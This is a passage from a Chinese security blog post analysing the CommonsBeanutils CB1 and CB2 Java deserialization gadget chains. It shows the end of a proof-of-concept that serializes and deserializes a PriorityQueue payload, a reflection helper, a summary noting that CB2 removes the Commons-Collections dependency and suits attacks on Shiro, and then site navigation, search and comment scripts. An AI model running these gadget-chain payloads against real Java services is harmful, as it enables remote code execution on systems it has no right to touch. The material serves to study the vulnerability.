class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="string">&quot;cb1payload.ser&quot;</span>));</span><br><span class="line">            outputStream.writeObject(pq);</span><br><span class="line">            outputStream.close();</span><br><span class="line"></span><br><span class="line">            <span class="type">ObjectInputStream</span> <span class="variable">inputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(<span class="string">&quot;cb1payload.ser&quot;</span>));</span><br><span class="line">            inputStream.readObject();</span><br><span class="line">            inputStream.close();</span><br><span class="line">        &#125;<span class="keyword">catch</span>(Exception e)&#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//通过反射给对象属性赋值，避免代码冗余繁琐</span></span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">setFieldValue</span><span class="params">(<span class="keyword">final</span> Object obj, <span class="keyword">final</span> String fieldName, <span class="keyword">final</span> Object value)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Field</span> <span class="variable">field</span> <span class="operator">=</span> obj.getClass().getDeclaredField(fieldName);</span><br><span class="line">        field.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        field.set(obj, value);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="0x05、总结"><a href="#0x05、总结" class="headerlink" title="0x05、总结"></a>0x05、总结</h1><p>总体来说就是CC2（templates+链转换器+PriorityQueue）利用将入口点改变为调用BeanComparator类，在BeanComparator类进行compare比较时，会调用getter&#x2F;setter javabean去获取比较对象的方法，若存在get&#x2F;set对应的方法，则通过反射执行该类的该方法，其中CB1链会依赖CC组件环境，CB2将BeanComparator类调用进行了赋值comparator比较器，规避了调用CC组件的comparator比较器，因此实现了无依赖cc环境，可主要用于shiro环境的漏洞攻击</p>
<h1 id="0x06、参考链接"><a href="#0x06、参考链接" class="headerlink" title="0x06、参考链接"></a>0x06、参考链接</h1><p>java漫谈<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_45449318/article/details/128571962">https://blog.csdn.net/qq_45449318/article/details/128571962</a><br><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/3zvJucvcStoJMgvawkp55w">https://mp.weixin.qq.com/s/3zvJucvcStoJMgvawkp55w</a></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/posts/ad3be142.html" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2023-03-22 16:30:00
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="标签"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/Java%E5%AE%89%E5%85%A8/" title="Java安全">
                        #Java安全
                      </a>
                    </span>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/java%E5%88%A9%E7%94%A8%E9%93%BE/" title="java利用链">
                        #java利用链
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x00%E3%80%81%E5%89%8D%E8%A8%80"><span class="toc-text">0x00、前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01%E3%80%81CommonsBeanutils%E6%8F%8F%E8%BF%B0"><span class="toc-text">0x01、CommonsBeanutils描述</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02%E3%80%81%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="toc-text">0x02、前置知识</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#templates%E3%80%81PriorityQueue"><span class="toc-text">templates、PriorityQueue</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#BeanComparator"><span class="toc-text">BeanComparator</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03%E3%80%81CB1%E5%88%86%E6%9E%90"><span class="toc-text">0x03、CB1分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E7%89%88%E6%9C%AC"><span class="toc-text">漏洞版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E7%8E%AF%E5%A2%83"><span class="toc-text">利用环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-text">分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%84%E9%80%A0POC"><span class="toc-text">构造POC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%8C%E6%95%B4POC"><span class="toc-text">完整POC</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x04%E3%80%81CB2%E5%88%86%E6%9E%90"><span class="toc-text">0x04、CB2分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E7%89%88%E6%9C%AC"><span class="toc-text">利用版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E7%8E%AF%E5%A2%83-1"><span class="toc-text">利用环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CB1%E4%BE%9D%E8%B5%96%E9%97%AE%E9%A2%98"><span class="toc-text">CB1依赖问题</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CB2%E5%88%86%E6%9E%90"><span class="toc-text">CB2分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#POC"><span class="toc-text">POC</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x05%E3%80%81%E6%80%BB%E7%BB%93"><span class="toc-text">0x05、总结</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x06%E3%80%81%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-text">0x06、参考链接</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        




  
    <script async type="text/javascript" src="/plugins/valine.min.js" onload="loadValineSuc(this)"></script>
  

  <div id="vcomments"></div>

  <script>
    function loadValineSuc() {
      new Valine({
        el: '#vcomments',
        appId: '5WzQHrZA6gNtoCZa9qWZkFjv-gzGzoHsz',
        appKey: 'O1mOg3eUPYzPIUYEaX54ip6s',
        placeholder: 'here',
        avatar: 'monsterid',
        lang: 'zh-CN'
      })
    }
  </script>

    <style>
      .comments-container .v .vempty {
        display: none!important;
      }
    </style>




      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/Okaytc">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a href="https://okaytc.github.io/">Copyright © Okaytc 2022</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a href="https://okaytc.github.io/">一个热爱健身的脚本小子</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + java%E5%AE%89%E5%85%A8-CB1%26CB2%E6%97%A0%E4%BE%9D%E8%B5%96CC%E9%93%BE%E5%AD%A6%E4%B9%A0%E4%B8%8E%E5%88%86%E6%9E%90 + '&url=' + https%3A%2F%2Fokaytc.github.io%2Fposts%2F638f8ee9.html + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://okaytc.github.io/posts/638f8ee9.html" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
